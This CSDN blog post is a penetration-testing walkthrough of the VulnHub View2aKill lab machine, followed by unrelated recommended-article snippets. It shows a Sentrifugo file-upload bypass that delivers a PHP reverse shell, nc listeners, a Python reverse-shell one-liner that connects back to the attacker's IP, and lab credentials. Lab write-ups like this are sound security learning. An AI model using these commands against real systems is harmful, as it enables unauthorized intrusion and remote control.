View2aKill渗透笔记

最新推荐文章于 2024-10-13 18:57:05 发布
最新推荐文章于 2024-10-13 18:57:05 发布
阅读量106 收藏
点赞数
分类专栏: 渗透学习 文章标签: 网络 web安全 安全 linux 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Keey9/article/details/130370367
版权

目录

1.前言

本文仅用于技术讨论与研究,不做任何导向,对于所有笔记中复现的这些终端、服务器或者实验环境,均为自行搭建的公开靶场,请勿在现实环境中模仿、操作。本文涉及到的工具仅就用到的方面做简要描述,如果想了解更详细的信息,请自行参阅其他技术资料。如果列出的技术用于其他任何目标,作者概不负责。

2.准备工作

镜像下载地址:https://download.vulnhub.com/view2akill/View2aKill.ova
难度:中等
文件下载完后,分别VMware导入,网卡1选择桥接模式,开启靶机
目标:获取/root/flag/flag.sh。
靶机IP:未知
本机kali IP:192.168.1.107

3.arp-scan主机发现

使用命令:

netdiscover -i eth0 -r 192.168.1.0/24

在这里插入图片描述
发现了局域网中存活的几台主机,IP:192.168.1.125是我们目标机器。

4.网络扫描

nmap  -A  -p-  192.168.1.125

在这里插入图片描述

编号端口服务版本
122sshOpenSSH 7.6p1
280HTTPApache httpd 2.4.29
325smtpPostfix smtpd
4819httpPHP cli server 5.5 or later

发现系统是linux,开放了21、25、80、8081端口,具体情况如下。

看看网站,浏览器访问:http://192.168.1.125

显示主页没什么东西。

5.目录扫描

dirsearch -u http://192.168.1.125

在这里插入图片描述

发现一些页面。/index.html是主面。/joomla/是一个视频。
http://192.168.1.125/dev/
在这里插入图片描述下载解压e_bkup.tar.gz。发现一些文件。
在这里插入图片描述在文件New_Employee_Onboarding_Chuck.rtf中发现登录及账号密码的信息。提示从HR管理门户登录,但是我们不知道路径在哪。用户名是chuck@localhost.com。密码是小写字体,密码来自R&D视频+ HID proxcard阅读器的传输频率。密码格式例子:facility007
在这里插入图片描述
在/dev目录下HID6005.pdf文件中查找frequency显示,transmit frequency为125kHz
在这里插入图片描述
在remote_control.gif中发现字符串HELICOPTER。
在这里插入图片描述

密码是字符串小写+transmit frequency。即账号chuck@localhost.com的密码是helicopter125。现在还不知道登录URL。继续查看扫描出来的目录。
http://192.168.1.125/pics/ 是图片和视频
在这里插入图片描述

/robots.txt。显示了一些信息。
在这里插入图片描述
访问http://192.168.1.125/zorin/
在这里插入图片描述
点击AQUISTIONS页面发现信息。
在这里插入图片描述
得知/sentrifugo 路径是登录界面。
在这里插入图片描述

使用账号密码chuck@localhost.com/helicopter125成功登录。
在这里插入图片描述

6.获取反弹shell

searchsploit sentrifugo   #搜索是否存在漏洞

在这里插入图片描述
按照第三个,即47323.txt描述的手动验证这个文件上传漏洞。
在这里插入图片描述

#复制kali自带的php反弹shell
cp  /usr/share/webshells/php/php-reverse-shell.php /home/kali/ 
#修改文件后缀
mv php-reverse-shell.php php-reverse-shell.php.doc
nc -vlp 4444  #监听本机端口,等待反弹shell连接

用burpsuit抓包,改包
把其中的php-reverse-shell.php.doc 修改为php-reverse-shell.php
application/msword 修改为 application/x-httpd-php

在这里插入图片描述

修改ip、port为kali的iP和监听端口。
在这里插入图片描述
burp放行到最后,获得反弹shell。
在这里插入图片描述

7.提权

python -c "import pty; pty.spawn('/bin/bash')"  #转tty

在/home/jenny目录下发现压缩包dsktp_backup.zip

unzip dsktp_backup.zip   #解压zip

发现两个文件
在这里插入图片描述
在passswords.txt文件中发现jenny的ssh账号密码。jenny/!!!sfbay!!!
在这里插入图片描述
#ssh连接到靶机,成功登录

ssh jenny@192.168.1.125
!!!sfbay!!!

在max目录下发现aView.py文件,jenny有读写执行权限,文件属于max,我们在其中写入反弹shell代码然后执行会获得max的权限。

#写入反弹代码到文件
echo "import pty;import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.1.107',5678));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn('/bin/bash')" > aView.py
nc -vlp 5678 #本机监听5678端口

在这里插入图片描述还是jenny用户,和ssh连接没区别。在note.txt文件中发现提示。8191端口存在隐藏路径。目录基于算法SHA1(lowercase alpha(a-z) + “view” + digit(0-9) + digit(0-9))生成。
在这里插入图片描述
写一个程序按照这个算法把所有可能的路径生成出来,然后把生成的路径作为字典,去爆破路径。

#字典生成代码
#!/usr/bin/python
# -*- coding: UTF-8 -*-
import string
from hashlib import sha1
import requests
fuzz=[]
for alpha in string.ascii_lowercase:
  for a in string.digits:
    for b in string.digits:
      payload= sha1((alpha + "view" + a + b + "\n").encode("utf-8")).hexdigest()
      fuzz.append(payload)
file1 = open("directories.txt","w")
for i in fuzz:
  file1.write(i)
  file1.write("\n")
file1.close()

执行这个代码就得到字典文件directorys.txt,然后进行url爆破。

dirb http://192.168.1.125:8191 directories.txt

在这里插入图片描述
这个路径爆破的返回值有几类,分别尝试访问。最后发现返回大小最大显示Execute。
http://192.168.1.125:8191/7f98ca7ba1484c66bf09627f931448053ae6b55a
在这里插入图片描述
重新监听5678端口。然后点击执行。
成功获得root权限。
在这里插入图片描述
执行/root/flag/run_me_for_flag.sh获得flag权限。

8.结语

涉及信息收集,文件上传限制绕过,python代码编写,burp的简单使用。
最后请各位师傅斧正!!!

北辰911
关注
专栏目录
『VulnHub系列』View2aKill: 1-Walkthrough
ins1ght的博客
12-09 1092
靶机发布日期:2019年10月29日,难度:中等。这篇博客在2019年11月21日就已经完成了,但是无奈某某办法出现了,所以里面关于CVE:2019-15814漏洞复现的地方删去了众多细节,请谅解!!!完成这个靶机的关键在于如何得到Sentrifugo系统的低权限账号的密码,其他的就是动动手~
Kali Linux自带webshell的使用
汗的博客
03-31 6935
大家都比较喜欢用菜刀、蚁剑、冰蝎这类图形化webshell管理工具,但是webshell的知识还是要有的,比如反弹常用的webshell。我简单介绍一下kali自带的反向webshell Kali自带webshell目录: /usr/share/webshells/ 可以看到有asp、aspx、jsp、perl、php等类型webshell 主要谈谈反弹的phpwebshellphp-rever...
vulnhub View2akill
底层社会中的弱智
02-19 464
每次都是直接使用nmap -Pn 网段扫出指定的靶机然后在-A -p- -T4 查看开放端口 我决定之后在使用nmap的会添加脚本的使用,每次打一个靶机就学习一个nmap的script脚本 然后自己搭建一个虚拟的防火墙来蹭加一下难度 目标 192.168.197.136 已知的开放端口 小分析一下: 22端口 ssh OpenSSH 7.61p1版本 目前没有已知的漏洞 25端...
linux几条工作中好用的命令
weixin_34416649的博客
01-08 58
DU:du -h --max-depth=1 | less查看盘信息、raid状态:omreport storage pdisk controller=0查看登录系统次数最多的ip:grep -o "[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}" /var/log/secure |sort -n|uniq ...
Linux下结束进程的几种命令,在Linux下使用Kill命令的技术点:包括重新加载进程和终止进程...
weixin_28323057的博客
04-28 771
本文介绍在Linux操作系统下使用Kill命令的技术点,包括使用Kill命令重新加载进程和使用Kill命令终止进程。前言Linux是一个很棒的高级操作系统,但并不是完美的。有时,某些应用程序可能会开始出现异常行为,并变得无响应或开始消耗大量系统资源。无法响应的应用程序无法重新启动,因为原始应用程序进程永远不会完全关闭,唯一的解决方案是重新启动系统或终止应用程序进程。有几种实用程序可让你终止错误的进...
python模拟文件上传(multipart/form-data形式)
weixin_42210687的博客
10-12 3537
我们通过抓包工具,抓到上传文件的时候下面的post传输的数据,就是浏览器控制器中显示的Request Payload ------WebKitFormBoundarynZb9BK3DBujba6Z2 Content-Disposition: form-data; name="__VIEWSTATE" /wEPDwUJNDc2MzM2OTk3ZGS0sDY2lwhw3cK6BpS7DP4LL/pVS...
Gbase 8a 常用管理语句- KILL
Mr_dar的博客
12-22 593
KILL 功能 KILL thread_id 语句可以终止一个线程。Gcluster 8a MPP Cluster 应用时每个连接都有属于自己的单独线程。 语法 KILL [CONNECTION | QUERY] thread_id 参数说明 参数名称 说明 KILL CONNECTION KILL CONNECTION 和没有选项修饰的 KILL 相同,用于终 止指定的 thread_id 线程。 KILL QU...
View-2aKill练习报告1
08-08
View-2aKill靶机练习中,涉及到多种网络协议的使用,包括SSH(Secure Shell)、SMTP(Simple Mail Transfer Protocol)以及HTTP。SSH是用于远程登录的安全协议,常用于管理服务器。靶机开放了SSH端口22,攻击者...
DEV-C++双人抢滩登陆1.1版推出了
橙羊的博客
08-13 866
女士们,先生们,我亲爱的粉丝们,你们梦寐以求的DEV-C++双人抢滩登陆1.1版我写好了!!!
oracle管理常用sql
11-24
- **或akill命令格式**: ```bash orakill <SID> ``` - `<SID>`: Oracle会话的SID号。 - `<THREAD>`: Oracle线程ID号。 - **获取SID和线程号**: ```sql SET PAGESIZE 100 SET LINESIZE 100 COLUMN Program ...
Ubuntu服务器基础搭建 nginx+php+mysql 顺带redis和ftp服务搭建
壶里护兔的博客
03-12 458
目录 准备: 准备: 如果是初期到手中的服务器,在使用 sudo 命令的时候,会如此报错:sudo: unable to resolve host XXX vim /etc/hostname #任意选择你想要的一串符号 "virtual" 加入,也可以不做更改 vim /etc/hosts 127.0.0.1 localhostvirtual sudo apt-...
IP数据包
permit7的博客
10-11 972
ARP协议是地址解析协议(Address Resolution Protocol)是通过解析IP地址得到MAC地址的,是一个在网络协议包中极其重要的网络传输协议,它与网卡有着极其密切的关系,在TCP/IP分层结构中,把ARP划分为网络层。
2024年网络安全进阶学习路径-2024年进阶学习指南
2401_85026965的博客
10-10 2035
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
网络安全学习路线图(2024版详解)
baimaozi008的博客
10-10 975
近期,大家在网上对于网络安全讨论比较多,想要学习的人也不少,但是需要学习哪些内容,按照什么顺序去学习呢?其实我们已经出国多版本的路线图,一直以来效果也比较不错,本次我们针对市场需求,整理了一套系统的路线图,供大家学习参考。希望大家按照路线图进行系统学习不仅可以的完成上岸,还能够系统化学习,提升自己的后期竞争力。
WireShark过滤器
ngczx的博客
10-11 662
Wireshark的过滤器规则可以分为**捕获过滤器**和**显示过滤器**,这两种过滤器有不同的编写规则
Netty 相比原生IO模型的优势
lssffy的博客
10-09 654
Java提供了多种I/O模型,每种模型都有其适用的场景和特点,随着网络应用需求的变化,I/O模型也在不断发展。阻塞I/O(BIO,Blocking I/O)传统的I/O模型,使用简单,但每次I/O操作都会阻塞线程。每个请求需要独立的线程来处理,这在并发请求较少时问题不大,但在高并发情况下,线程资源将成为瓶颈。非阻塞I/O(NIO,Non-Blocking I/O)引入了多路复用技术,一个线程可以处理多个连接,避免了BIO中每个连接占用一个线程的问题。通过Selector。
Linux系统性能调优技巧详解
运维人生
10-13 436
Linux系统性能调优是一个复杂而持续的过程,需要综合考虑硬件、软件、内核参数、进程管理等多个方面。通过合理的调优措施和持续的监控调整,可以显著提升Linux系统的运行效率和稳定性,为业务提供强有力的支持。性能调优是一个持续的过程,需要不断地监控、分析和调整,以适应不断变化的工作负载和系统环境。希望本文的介绍和代码示例能够帮助您在Linux系统性能调优方面取得更好的效果。
找到占用5601端口的进程ID
最新发布
m0_46695127的博客
10-13 239
找到占用5601端口的进程ID
《C++中实现高效网络流处理的关键技术与实践》
xy520521的博客
10-08 737
在一个简单的服务器程序中,如果使用阻塞式 I/O,当有大量客户端同时连接时,服务器需要为每个客户端创建一个线程,而这些线程大部分时间都处于阻塞状态,浪费了大量的系统资源。例如,Google 的 Protocol Buffers 和 Facebook 的 FlatBuffers 都是非常高效的序列化库,它们可以将数据序列化为紧凑的二进制格式,减少数据的传输量和序列化/反序列化的时间。在进行网络流处理时,可以对协议头进行优化,减少不必要的信息传输,提高数据传输的效率。选择合适的网络编程模型。
Note24100901_Portal_V18_Advanced5_Modscan的Modbus仿真
qq_51407861的博客
10-09 273
在这里插入图片描述](https://i-blog.csdnimg.cn/direct/8d85098268484044b2816d8a78c031f4.png#pic_center。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值